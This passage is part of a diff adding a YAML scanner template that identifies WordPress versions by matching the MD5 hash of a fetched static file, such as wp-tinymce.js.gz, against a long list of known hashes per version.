"(\"edc1c98719dffa3cddfac22dc100f605\" == md5(body))" 
+ - type: dsl + name: 4.5.1 + dsl: + - "(\"5a06021dcac8af1d9790c5a3927d5235\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"7abbf8d3edc718acefcbe963ecb4eb61\" == md5(body))" + - type: dsl + name: 4.4.9 + dsl: + - "(\"5bfaba705cf6ed2704d911443f116049\" == md5(body))" + - type: dsl + name: 4.4.8 + dsl: + - "(\"f13e86c96001ab7dc004e7e7364f3976\" == md5(body))" + - type: dsl + name: 4.4.7 + dsl: + - "(\"c17af93c54f5e0f82f7d522b23254a01\" == md5(body))" + - type: dsl + name: 4.4.6 + dsl: + - "(\"95cf7c3c42b0fba340e4ba9c7c637dfc\" == md5(body))" + - type: dsl + name: 4.4.5 + dsl: + - "(\"d7d38b02f37be897fca290cfacfba50a\" == md5(body))" + - type: dsl + name: 4.4.4 + dsl: + - "(\"02c45477bc7ab7d9ab792919f41833cc\" == md5(body))" + - type: dsl + name: 4.4.3 + dsl: + - "(\"bb98b2cfe4e40d32280f8e79f18a3171\" == md5(body))" + - type: dsl + name: 4.4.2 + dsl: + - "(\"c17664e85bfe1b94a71597f49af06f77\" == md5(body))" + - type: dsl + name: 4.4.11 - 4.4.12 + dsl: + - "(\"41239be0065fa9d0afb246efcc9f782c\" == md5(body))" + - type: dsl + name: 4.4.10 + dsl: + - "(\"109d8930d992a36f805ac0a342c5b2e1\" == md5(body))" + - type: dsl + name: 4.4.1 + dsl: + - "(\"4aa090adebb81f9d0aeb38e1fd9ce2ec\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"30d62b21a621e81280b10e73945a5c38\" == md5(body))" + - type: dsl + name: 4.3.9 + dsl: + - "(\"1ee25af3ea3fc41b19cc3ffe032bb7e2\" == md5(body))" + - type: dsl + name: 4.3.8 + dsl: + - "(\"2a7f4dc8bd52d5d2e0cdea58d5949bff\" == md5(body))" + - type: dsl + name: 4.3.7 + dsl: + - "(\"01d23a48d9f2397d36dffd8d3cd2a83a\" == md5(body))" + - type: dsl + name: 4.3.6 + dsl: + - "(\"3d896637a80f2816b92684ae9276cddd\" == md5(body))" + - type: dsl + name: 4.3.5 + dsl: + - "(\"f957307acd12e95204a2c383272ce0fd\" == md5(body))" + - type: dsl + name: 4.3.4 + dsl: + - "(\"06c8085308f4e22411c477710338518c\" == md5(body))" + - type: dsl + name: 4.3.3 + dsl: + - "(\"324635de8b1d97e1e51d22b2dd79d472\" == md5(body))" + - type: dsl + name: 4.3.2 + dsl: + - 
"(\"80e2027d2ae1394172820adc117d51af\" == md5(body))" + - type: dsl + name: 4.3.12 - 4.3.13 + dsl: + - "(\"730ab685dd9a1742275818cdb3e44643\" == md5(body))" + - type: dsl + name: 4.3.11 + dsl: + - "(\"2489eed974e0d786eb3ca1798bf1c20a\" == md5(body))" + - type: dsl + name: 4.3.10 + dsl: + - "(\"caceccdf6f23dcfa5aa582b307d9929c\" == md5(body))" + - type: dsl + name: 4.3.1 + dsl: + - "(\"29c26e3150a452ccea556ee308935691\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"0d302db33ba0e49aaac1698423ef4b54\" == md5(body))" + - type: dsl + name: 4.2.9 + dsl: + - "(\"7346ab0a4d46d23cef6b6888a0727260\" == md5(body))" + - type: dsl + name: 4.2.8 + dsl: + - "(\"6adca796716ba77896b2a68c16ae99f2\" == md5(body))" + - type: dsl + name: 4.2.7 + dsl: + - "(\"60598928e506e91491f9322e94cf52a6\" == md5(body))" + - type: dsl + name: 4.2.6 + dsl: + - "(\"3296a741eaf6388b41f2b1e3d78783b8\" == md5(body))" + - type: dsl + name: 4.2.5 + dsl: + - "(\"37e612ca4b342f682e0ad48b78de6cc9\" == md5(body))" + - type: dsl + name: 4.2.4 + dsl: + - "(\"31053c9e79e9e63bc76b8eb92f68ec75\" == md5(body))" + - type: dsl + name: 4.2.3 + dsl: + - "(\"3ed7c1a6e718ccce554978fdaab6526a\" == md5(body))" + - type: dsl + name: 4.2.2 + dsl: + - "(\"8592124f91d6da8273fc42b419f384b0\" == md5(body))" + - type: dsl + name: 4.2.16 - 4.2.17 + dsl: + - "(\"b78ccf8b524dcd2f9706d919d036e61a\" == md5(body))" + - type: dsl + name: 4.2.15 + dsl: + - "(\"622cdb329b1b5b5a6f5d76988df4272c\" == md5(body))" + - type: dsl + name: 4.2.14 + dsl: + - "(\"2fa1bad18fb6dde791717f130373dc56\" == md5(body))" + - type: dsl + name: 4.2.13 + dsl: + - "(\"987eb46a501ec849f3f901e81b5b1871\" == md5(body))" + - type: dsl + name: 4.2.12 + dsl: + - "(\"6cdc477ceb7d6bba951928c2445823aa\" == md5(body))" + - type: dsl + name: 4.2.11 + dsl: + - "(\"ddf7eb2aae278ab3a355aa248f9d8209\" == md5(body))" + - type: dsl + name: 4.2.10 + dsl: + - "(\"162ee7badad63243dfe7c4679af1c019\" == md5(body))" + - type: dsl + name: 4.2.1 + dsl: + - 
"(\"f18dcf7c554efc0b197d2a320e5cd248\" == md5(body))" + - type: dsl + name: 4.2 + dsl: + - "(\"ded215e7acec9f6d04f3e370f486d3aa\" == md5(body))" + - type: dsl + name: 4.1.9 + dsl: + - "(\"db5c7b4f7bab8f481dbc78262bb92c2b\" == md5(body))" + - type: dsl + name: 4.1.8 + dsl: + - "(\"97fa4d86c9b424b8810f872d1803d118\" == md5(body))" + - type: dsl + name: 4.1.7 + dsl: + - "(\"f91912f2fad5f1383927c9e98d3a7746\" == md5(body))" + - type: dsl + name: 4.1.6 + dsl: + - "(\"0b91870a4cc0857bbcd9c140791ddede\" == md5(body))" + - type: dsl + name: 4.1.5 + dsl: + - "(\"30215f440132ce7414c4c48d1f520767\" == md5(body))" + - type: dsl + name: 4.1.4 + dsl: + - "(\"21584d9435d82fd371904611a7e25289\" == md5(body))" + - type: dsl + name: 4.1.3 + dsl: + - "(\"60ce7d3fed721c23cc46c7aaa77c1df8\" == md5(body))" + - type: dsl + name: 4.1.2 + dsl: + - "(\"58c2fe4eb8b7866abb8912dc7fc2f616\" == md5(body))" + - type: dsl + name: 4.1.19 - 4.1.20 + dsl: + - "(\"f66b292419a257a80d989a878fae8f8e\" == md5(body))" + - type: dsl + name: 4.1.18 + dsl: + - "(\"2822d4dc7ca874e3d1e76fd7c514efcc\" == md5(body))" + - type: dsl + name: 4.1.17 + dsl: + - "(\"405dedbfeec91210f7bab16575b56035\" == md5(body))" + - type: dsl + name: 4.1.16 + dsl: + - "(\"6767e3998a33bb43d004fab866af06c2\" == md5(body))" + - type: dsl + name: 4.1.15 + dsl: + - "(\"f2ed0468d9ca40932e96ebe77e773762\" == md5(body))" + - type: dsl + name: 4.1.14 + dsl: + - "(\"93d4cbf103b49ad6998f6a480519ced6\" == md5(body))" + - type: dsl + name: 4.1.13 + dsl: + - "(\"fb4c2052b147355ba0b658d7860c37a5\" == md5(body))" + - type: dsl + name: 4.1.12 + dsl: + - "(\"6c1415726fe2f04ad0157c6174d1f734\" == md5(body))" + - type: dsl + name: 4.1.11 + dsl: + - "(\"b0289dd7b86fb56f07708bb14f3795fc\" == md5(body))" + - type: dsl + name: 4.1.10 + dsl: + - "(\"04815654ef433ae5b019786e7c3753f1\" == md5(body))" + - type: dsl + name: 4.1.1 + dsl: + - "(\"ce78b2213f70701834658c9007f0c947\" == md5(body))" + - type: dsl + name: 4.1 + dsl: + - 
"(\"321aad4ba63043f888cb072cedf9ef78\" == md5(body))" + - type: dsl + name: 4.0.9 + dsl: + - "(\"288f36185879e687f7cae3a7a41f8d6c\" == md5(body))" + - type: dsl + name: 4.0.8 + dsl: + - "(\"009dd49817e70b9859b50d7d7e2b8152\" == md5(body))" + - type: dsl + name: 4.0.7 + dsl: + - "(\"4ad554f864ffaf1ac491a610ba054e49\" == md5(body))" + - type: dsl + name: 4.0.6 + dsl: + - "(\"62a283e6ecb4bb247123392312469b40\" == md5(body))" + - type: dsl + name: 4.0.5 + dsl: + - "(\"1adf30a1d6fe172f37da7dca83496c7d\" == md5(body))" + - type: dsl + name: 4.0.4 + dsl: + - "(\"85a6b662f1733509acb224c273897b24\" == md5(body))" + - type: dsl + name: 4.0.3 + dsl: + - "(\"411d19aaa3bb5d45f8aa8714575ee48b\" == md5(body))" + - type: dsl + name: 4.0.2 + dsl: + - "(\"ed8777afffc86285afc57984da43fdbd\" == md5(body))" + - type: dsl + name: 4.0.19 - 4.0.20 + dsl: + - "(\"4445478174fb84e1d0a1b2e14a7327c7\" == md5(body))" + - type: dsl + name: 4.0.18 + dsl: + - "(\"17b05be902fc20a3d2428d41e01edf43\" == md5(body))" + - type: dsl + name: 4.0.17 + dsl: + - "(\"8a91b1b0d5a535fe165bdf254ebdb40e\" == md5(body))" + - type: dsl + name: 4.0.16 + dsl: + - "(\"1d0ce532b0158c58560b8018f461d5d3\" == md5(body))" + - type: dsl + name: 4.0.15 + dsl: + - "(\"e53f13483b321b874cdb48b644a83ed1\" == md5(body))" + - type: dsl + name: 4.0.14 + dsl: + - "(\"84d35f2059bd5466c4f95cb632e710f3\" == md5(body))" + - type: dsl + name: 4.0.13 + dsl: + - "(\"01054cfb251b2bd00dc51f3a1c4beb5d\" == md5(body))" + - type: dsl + name: 4.0.12 + dsl: + - "(\"21a788d3e8b7945c20a47b975b3fc915\" == md5(body))" + - type: dsl + name: 4.0.11 + dsl: + - "(\"1b7fdd91e1cea1cb18779262e7b13dd0\" == md5(body))" + - type: dsl + name: 4.0.10 + dsl: + - "(\"ac4edd239f424cd811d0bb0097354405\" == md5(body))" + - type: dsl + name: 4.0.1 + dsl: + - "(\"70cdb035f3dd51138d5997eaa4d93798\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"f00855fca05f89294d0fcee6bebea64a\" == md5(body))" + - type: dsl + name: 3.9.9 + dsl: + - 
"(\"87f4b1dd4ea5e17b30233722077adb0c\" == md5(body))" + - type: dsl + name: 3.9.8 + dsl: + - "(\"c4371f9433505dd8cea5f03bf5e6c328\" == md5(body))" + - type: dsl + name: 3.9.7 + dsl: + - "(\"1a6acdaa1de27568ce672ff9748914e0\" == md5(body))" + - type: dsl + name: 3.9.6 + dsl: + - "(\"2e7463a0999c6495b6d1c79a48c81d46\" == md5(body))" + - type: dsl + name: 3.9.5 + dsl: + - "(\"57b9f0931f2da4389af92e07bc702505\" == md5(body))" + - type: dsl + name: 3.9.4 + dsl: + - "(\"38466bbd5205e09d8bbb4e46bfd4aec5\" == md5(body))" + - type: dsl + name: 3.9.3 + dsl: + - "(\"62a78170a740a4460a8d25e00c1839f5\" == md5(body))" + - type: dsl + name: 3.9.20 - 3.9.21 + dsl: + - "(\"50321fc2a768254650e69e0b4562473e\" == md5(body))" + - type: dsl + name: 3.9.2 + dsl: + - "(\"dfb2d2be1648ee220bf9bd3c03694ed8\" == md5(body))" + - type: dsl + name: 3.9.19 + dsl: + - "(\"43a22d7b481375d78386c9593fd1eb77\" == md5(body))" + - type: dsl + name: 3.9.18 + dsl: + - "(\"00a16ead6ba35a470f68fe6a3aa56210\" == md5(body))" + - type: dsl + name: 3.9.17 + dsl: + - "(\"606d396504f13604794ec78b9d6bbd03\" == md5(body))" + - type: dsl + name: 3.9.16 + dsl: + - "(\"8f4d451aeead063e6367c9d5dcd02ee7\" == md5(body))" + - type: dsl + name: 3.9.15 + dsl: + - "(\"e61db9d4bdf4493d01f93b7f2d31b7aa\" == md5(body))" + - type: dsl + name: 3.9.14 + dsl: + - "(\"38cbc7bd229691e2f7570f39e2ed79f0\" == md5(body))" + - type: dsl + name: 3.9.13 + dsl: + - "(\"ae364ca23dae20cbdbfa5f861aa70e13\" == md5(body))" + - type: dsl + name: 3.9.12 + dsl: + - "(\"5cb6e5fcb570702e99792352d0288a8a\" == md5(body))" + - type: dsl + name: 3.9.11 + dsl: + - "(\"342344249a8f5cbfb205262aaf353a16\" == md5(body))" + - type: dsl + name: 3.9.10 + dsl: + - "(\"d517492c730895ce405875758f5942b3\" == md5(body))" + - type: dsl + name: 3.9.1 + dsl: + - "(\"cdbf9b18e3729b3553437fc4e9b6baad\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"84b54c54aa48ae72e633685c17e67457\" == md5(body))" + - type: dsl + name: 3.8.9 + dsl: + - 
"(\"38ce781f075385a61979a705ee120de6\" == md5(body))" + - type: dsl + name: 3.8.8 + dsl: + - "(\"eef2236f174830a5ea4ef6346c9b6d23\" == md5(body))" + - type: dsl + name: 3.8.7 + dsl: + - "(\"0f74cf5708da39cb3c86dc49c8f276c8\" == md5(body))" + - type: dsl + name: 3.8.6 + dsl: + - "(\"ad646c841cf11f2dc8a8f76f65e4ca42\" == md5(body))" + - type: dsl + name: 3.8.5 + dsl: + - "(\"4821f33f92f597623a524a34f3be4651\" == md5(body))" + - type: dsl + name: 3.8.4 + dsl: + - "(\"fb73e4ab558adc3948adf2653e28d880\" == md5(body))" + - type: dsl + name: 3.8.3 + dsl: + - "(\"c6de8fc70a18be7e5c36198cd0f99a64\" == md5(body))" + - type: dsl + name: 3.8.22 - 3.8.23 + dsl: + - "(\"9ef246991d6fb8db9688e941fc09fff9\" == md5(body))" + - type: dsl + name: 3.8.21 + dsl: + - "(\"306425f612332d620df886472c5eb1df\" == md5(body))" + - type: dsl + name: 3.8.20 + dsl: + - "(\"034d1d6b0408ccc3a3a18314ad8503da\" == md5(body))" + - type: dsl + name: 3.8.2 + dsl: + - "(\"e01a2663475f6a7a8363a7c75a73fe23\" == md5(body))" + - type: dsl + name: 3.8.19 + dsl: + - "(\"dcf9f4bb18fb35da77d9870d522e236b\" == md5(body))" + - type: dsl + name: 3.8.18 + dsl: + - "(\"39364ff8391782cbd182e7061b3db3fe\" == md5(body))" + - type: dsl + name: 3.8.17 + dsl: + - "(\"3c06b96336ba61373c24ad5f6c4f6e52\" == md5(body))" + - type: dsl + name: 3.8.16 + dsl: + - "(\"fbf520feecde27820e9f27ed409440d5\" == md5(body))" + - type: dsl + name: 3.8.15 + dsl: + - "(\"3abfa03d4f3a5a52f55ddc31fc536933\" == md5(body))" + - type: dsl + name: 3.8.14 + dsl: + - "(\"e55306288cf2edc63e25414fbb22de37\" == md5(body))" + - type: dsl + name: 3.8.13 + dsl: + - "(\"6d479ec8dfb4917d96f3cee805cd36ae\" == md5(body))" + - type: dsl + name: 3.8.12 + dsl: + - "(\"2d2914c37b51e6f266ab50b561574dd6\" == md5(body))" + - type: dsl + name: 3.8.11 + dsl: + - "(\"5bbd02dd56f85902dfe6f79081bc1e14\" == md5(body))" + - type: dsl + name: 3.8.10 + dsl: + - "(\"ebdf3445a03dca2d2f3d4097a3db9e30\" == md5(body))" + - type: dsl + name: 3.8.1 + dsl: + - 
"(\"0d0eb101038124a108f608d419387b92\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"38ee273095b8f25b9ffd5ce5018fc4f0\" == md5(body))" + - type: dsl + name: 3.7.9 + dsl: + - "(\"24316a634083214fd1c4b99472ef8fbd\" == md5(body))" + - type: dsl + name: 3.7.8 + dsl: + - "(\"2bc39c43b8540a7fedeb7bbd9de1ce58\" == md5(body))" + - type: dsl + name: 3.7.7 + dsl: + - "(\"c40340aad98640725093e05797056bd2\" == md5(body))" + - type: dsl + name: 3.7.6 + dsl: + - "(\"b9ebf4eb4a24be0bd82094da0baf13cf\" == md5(body))" + - type: dsl + name: 3.7.5 + dsl: + - "(\"61f1e5fbbd9ecb69c90cb96a19160ae5\" == md5(body))" + - type: dsl + name: 3.7.4 + dsl: + - "(\"dc09e38cb48fbbec5b5f990513b491e4\" == md5(body))" + - type: dsl + name: 3.7.3 + dsl: + - "(\"813e06052daa0692036e60d76d7141d3\" == md5(body))" + - type: dsl + name: 3.7.22 - 3.7.23 + dsl: + - "(\"07f33efaba18b0292d26e7319b8f40f7\" == md5(body))" + - type: dsl + name: 3.7.21 + dsl: + - "(\"d0b935c4bd9daa500ee76b6a911abb07\" == md5(body))" + - type: dsl + name: 3.7.20 + dsl: + - "(\"01d1cb3de3ab503530218d06a39fd02e\" == md5(body))" + - type: dsl + name: 3.7.2 + dsl: + - "(\"b3a05c7a344c2f53cb6b680fd65a91e8\" == md5(body))" + - type: dsl + name: 3.7.19 + dsl: + - "(\"77de437f7578bc09cec06e7938606ecd\" == md5(body))" + - type: dsl + name: 3.7.18 + dsl: + - "(\"7b43ecac59a1bfe0f1a943bcccc827ef\" == md5(body))" + - type: dsl + name: 3.7.17 + dsl: + - "(\"fffe9145a1435352e5fda177eb7ab8d8\" == md5(body))" + - type: dsl + name: 3.7.16 + dsl: + - "(\"c6719b2bf475a6adfc49fd309935d0f4\" == md5(body))" + - type: dsl + name: 3.7.15 + dsl: + - "(\"43687e50ed6f31595eb912e27716c130\" == md5(body))" + - type: dsl + name: 3.7.14 + dsl: + - "(\"87926a66b3e42919c6d47fe9d8655287\" == md5(body))" + - type: dsl + name: 3.7.13 + dsl: + - "(\"81fc07a5d7ffed7de5523d31787718ae\" == md5(body))" + - type: dsl + name: 3.7.12 + dsl: + - "(\"848745041001ecc0833a5cb09d9e1240\" == md5(body))" + - type: dsl + name: 3.7.11 + dsl: + - 
"(\"375f2e632c542152037551a335fda8c4\" == md5(body))" + - type: dsl + name: 3.7.10 + dsl: + - "(\"985a1a42445325fc2f7d6bd121d19696\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.1 + dsl: + - "(\"4717bf89e299ff054760ec8b0768c9e1\" == md5(body))" + - type: dsl + name: 3.6.1 + dsl: + - "(\"e82f4fe7d3c1166afb4c00856b875f16\" == md5(body))" + - type: dsl + name: 3.6 + dsl: + - "(\"477f1e652f31dae76a38e3559c91deb9\" == md5(body))" + - type: dsl + name: 3.5.2 + dsl: + - "(\"caf7946275c3e885419b1d36b22cb5f3\" == md5(body))" + - type: dsl + name: 3.5.1 + dsl: + - "(\"05d50a04ef19bd4b0a280362469bf22f\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"066cfc0f9b29ae6d491aa342ebfb1b71\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - "(\"c6514a15e04bd9ec96df4d9b78c17bc5\" == md5(body))" + - type: dsl + name: 3.4.1 + dsl: + - "(\"9ecbb128295ac324f63a6adc0b6e78ea\" == md5(body))" + - type: dsl + name: 3.4 + dsl: + - "(\"34b3071c2c48f0b1a611c2ee9f1b3516\" == md5(body))" + - type: dsl + name: 3.3.3 + dsl: + - "(\"36b2b72a0f22138a921a38db890d18c1\" == md5(body))" + - type: dsl + name: 3.3.2 + dsl: + - "(\"628419c327ca5ed8685ae3af6f753eb8\" == md5(body))" + - type: dsl + name: 3.3.1 + dsl: + - "(\"c1ed266e26a829b772362d5135966bc3\" == md5(body))" + - type: dsl + name: 3.3 + dsl: + - "(\"e0f97110b60c3a3c71dcd1d4d923495a\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"98d3f05ff1e321dbd58ad154cc95e569\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"573e79628d2ee07670e889569059669e\" == md5(body))" + - type: dsl + name: 3.1.4 + dsl: + - "(\"fbebf5899944a9d7aedd00250bb71745\" == md5(body))" + - type: dsl + name: 3.1.3 + dsl: + - "(\"ccc403368e01b3c3b0caf28079a710a5\" == md5(body))" + - type: dsl + name: 3.1.2 + dsl: + - "(\"20f882b08b2804bc7431c0866a8999d1\" == md5(body))" + - type: dsl + name: 3.1.1 + dsl: + - "(\"5be6140fc3f44126b476dfff5bc0c658\" == md5(body))" + - type: dsl + name: 3.1 + dsl: + - "(\"f01635ffca23e49e01f47e98553ea75d\" == 
md5(body))" + - type: dsl + name: 3.0.6 + dsl: + - "(\"45119882b8d576a3462f76708b6bc1c5\" == md5(body))" + - type: dsl + name: 3.0.5 + dsl: + - "(\"ed20f283f2c1b775219bdb12e5c6ba93\" == md5(body))" + - type: dsl + name: 3.0.4 + dsl: + - "(\"c7a01d814ffbbb790ee5f4f8f3631903\" == md5(body))" + - type: dsl + name: 3.0.3 + dsl: + - "(\"0eb4f7981c3de98df925b3020c147a61\" == md5(body))" + - type: dsl + name: 3.0.2 + dsl: + - "(\"0538342b887f11ed4a306d3e7c7d6ea7\" == md5(body))" + - type: dsl + name: 3.0.1 + dsl: + - "(\"a73cac84b8b9a99377917a6974c9eea2\" == md5(body))" + - type: dsl + name: 3.0 + dsl: + - "(\"9ea06ab0184049bf4ea2410bf51ce402\" == md5(body))" + - type: dsl + name: 2.9.2 + dsl: + - "(\"6cfb514bbb51d883bb6fece65d5fd450\" == md5(body))" + - type: dsl + name: 2.9.1 + dsl: + - "(\"80c4ecc8630395baeb7363a7cf4dad33\" == md5(body))" + - type: dsl + name: 2.9 + dsl: + - "(\"1eaf3b4f4c2d039d26a473c0e0b5622e\" == md5(body))" + - type: dsl + name: 2.8.6 + dsl: + - "(\"027283d03b08abae67279fd17a37760b\" == md5(body))" + - type: dsl + name: 2.8.5 + dsl: + - "(\"f32252ef12c927f6285e4fb29efce04f\" == md5(body))" + - type: dsl + name: 2.8.4 + dsl: + - "(\"7d93c7feb3e2e2c2112474f92e3ee6f8\" == md5(body))" + - type: dsl + name: 2.8.3 + dsl: + - "(\"de32a1268d126ea71127ad5f9fa8f60d\" == md5(body))" + - type: dsl + name: 2.8.2 + dsl: + - "(\"ef8665ddd2d87badccb3532705b95992\" == md5(body))" + - type: dsl + name: 2.8.1 + dsl: + - "(\"7ed95e0b7ae663cbd0a8e77d787a4637\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"4a64408bdaaa6c8af7cab9346f0ce380\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"94c4cdfa20778d1bf9784941f9fca133\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"0377751ad219ccbb809d527952ff7325\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"5bca147a86a1d277328c298ab06b772b\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"c3024b888aeb1539f4c29df7b166d483\" == md5(body))" + - type: dsl + name: 
2.3 - 2.3.3 + dsl: + - "(\"95803b846df1873416ee96c1577b3adf\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"939a797929aec1b8e0039014e9a29433\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"a5bc745849e1971abf8efb9a135ce764\" == md5(body))" + - type: dsl + name: 2.0.8 - 2.0.11 + dsl: + - "(\"ec9a2ffad38a3f0185aa6d9c0b8d6673\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.7 + dsl: + - "(\"010ac2a095f4d30b2a650b94cf3f8842\" == md5(body))" + - type: dsl + name: 1.5-strayhorn - 1.5.2 + dsl: + - "(\"aaa2d12586d9632c76b7b7f03d58a9f6\" == md5(body))" + - type: dsl + name: 1.5.1 - 1.5.1.2 + dsl: + - "(\"c60692ee8e176db0ac0be5ca69ba6c24\" == md5(body))" + - type: dsl + name: 1.2-mingus - 1.2.2 + dsl: + - "(\"6c3c457ed408be44244edc121cada9a2\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"75eaf1c4b267e11fffd42c34e8832567\" == md5(body))" + - type: dsl + name: 1.2-delta + dsl: + - "(\"790736d62d442117f9d28b64161919a2\" == md5(body))" + - type: dsl + name: 1.0.2-blakey - 1.0.2 + dsl: + - "(\"c91375254e9f56e45939ffcc28424c72\" == md5(body))" + - type: dsl + name: 1.0.1-miles + dsl: + - "(\"7ccd56b1c5b7123ed9afb222e6e93924\" == md5(body))" + - type: dsl + name: 1.0-platinum + dsl: + - "(\"6e08f4bfb7f79de78a3278f0f4ad981f\" == md5(body))" + - type: dsl + name: 0.71-gold + dsl: + - "(\"0c1e4a01d4ccf6dbedda30bf3c5eeb9e\" == md5(body))" + - type: dsl + name: 4.6.9 - 4.6.20 + dsl: + - "(\"22ff6681a981a59d29c22339e164c4cb\" == md5(body))" + - type: dsl + name: 4.4.13 - 4.5.23 + dsl: + - "(\"27ab6ce46fbbd0cf42bc22f13f2b2529\" == md5(body))" + - type: dsl + name: 4.2.18 - 4.3.25 + dsl: + - "(\"5eda30f3d56256140bb60e3a74a62b95\" == md5(body))" + - type: dsl + name: 4.1.21 - 4.1.32 + dsl: + - "(\"804455d5f94ca2dc7bb0821132d2c71b\" == md5(body))" + - type: dsl + name: 3.9.22 - 4.0.32 + dsl: + - "(\"f494518b64cf3bd7eb05d338f7b517c0\" == md5(body))" + - type: dsl + name: 3.8.24 - 3.8.35 + dsl: + - "(\"6f35fef364cb0dcae2bcb1ed9ff010ac\" == 
md5(body))" + - type: dsl + name: 3.7.24 - 3.7.35 + dsl: + - "(\"2cedb7a4d561a04923ba01f685d53148\" == md5(body))" + - type: dsl + name: 4.9.5 - 5.0.11 + dsl: + - "(\"55d27f1f9f7f79fa2593a5b32907ee44\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8bab7518f58bde0cb9eaee02872d8a3f\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"8734f564e795dad3f234b79f58e899d0\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"c290bd03cbf76b858525f07d58925680\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"110d7bcc31f57903d611fcfa69c01d3c\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"ad262162850a9a80bf78ce0f52a3e629\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/wp-tinymce.js.gz" + matchers: + - type: dsl + name: 4.8.2 - 4.8.15 + dsl: + - "(\"c022b3c86a98fd5fca9c08a194dcff76\" == md5(body))" + - type: dsl + name: 4.8.1 + dsl: + - "(\"a7fb7552f7da68361ffa673546bb1efe\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"3bf7827cf5e51f105ac3c462be109a3d\" == md5(body))" + - type: dsl + name: 4.7.6 - 4.7.19 + dsl: + - "(\"1ae89b4f452465b662619b182f6f1c4e\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.5 + dsl: + - "(\"191e12b07c0ba85b743a465e40c55183\" == md5(body))" + - type: dsl + name: 4.7.3 + dsl: + - "(\"15c2b9ef65635dfc0ae35db3407f5c34\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"9b37eea472171dbe52aceb909b81c292\" == md5(body))" + - type: dsl + name: 4.6.7 - 4.6.20 + dsl: + - "(\"f98ca0bdf5184d89e4efbe2451c9f3f2\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.6 + dsl: + - "(\"acd879c7ba04826969df23c5c9a8efb7\" == md5(body))" + - type: dsl + name: 4.5.3 - 4.5.9 + dsl: + - "(\"94bfaa271ff7909a2a79be05af4eae80\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.2 + dsl: + - "(\"fe49d6e2b566f613c3e485d3fad56b8b\" == md5(body))" + - type: dsl + name: 4.5.10 - 4.5.23 + dsl: + - "(\"89d7aecba16c8e5e06f54b47ff382783\" == md5(body))" + - 
type: dsl + name: 4.5 + dsl: + - "(\"40de3da265b56fb06463a946ccc6aa40\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.10 + dsl: + - "(\"60f3b6b1b2403654869b1232e35dfb92\" == md5(body))" + - type: dsl + name: 4.4.11 - 4.4.24 + dsl: + - "(\"39ef25c8879a357bf0580f50fac0c688\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.11 + dsl: + - "(\"ef12d9d3ef6c25d448e428619e49b730\" == md5(body))" + - type: dsl + name: 4.3.12 - 4.3.25 + dsl: + - "(\"2c1802232e52dcc43e6ea3624ae25302\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"b8177e0d45cb3b1f1f369148b64e9cdb\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"35190a121b43780c0893ed5e92a02d60\" == md5(body))" + - type: dsl + name: 4.2.2 + dsl: + - "(\"937d1ec0bf894d9686332fc3f71e6d22\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"ce57362b7811e80becfe125cfafc1716\" == md5(body))" + - type: dsl + name: 4.1.5 - 4.1.32 + dsl: + - "(\"f3e951b15db00c5e82cb46f6d941104f\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.4 + dsl: + - "(\"64fd6a9dd5366830074362d07d205018\" == md5(body))" + - type: dsl + name: 4.1 + dsl: + - "(\"66ff6b408c58c3207ff4b20e75ec5e68\" == md5(body))" + - type: dsl + name: 4.0.5 - 4.0.32 + dsl: + - "(\"e0a1a03f8f8c38df813528fe5bc7f913\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.4 + dsl: + - "(\"3966bc13b65d9487dc6772c615b05cd9\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"21f15ceb6c245e6dc0edc510761049ba\" == md5(body))" + - type: dsl + name: 3.9.6 - 3.9.33 + dsl: + - "(\"5e93aac0321c9a2b8e95e3826d32ba13\" == md5(body))" + - type: dsl + name: 3.9.3 - 3.9.5 + dsl: + - "(\"f094cea5fe2b1c870c662ff4794c589f\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.2 + dsl: + - "(\"de42820ca28cfc889f428dbef29621c3\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"1d52314b1767c557b7232ae192c80318\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"75f2e0d09c07216a86a99c3b6e6772a4\" == md5(body))" + - type: dsl + name: 3.7.1 - 3.7.33 
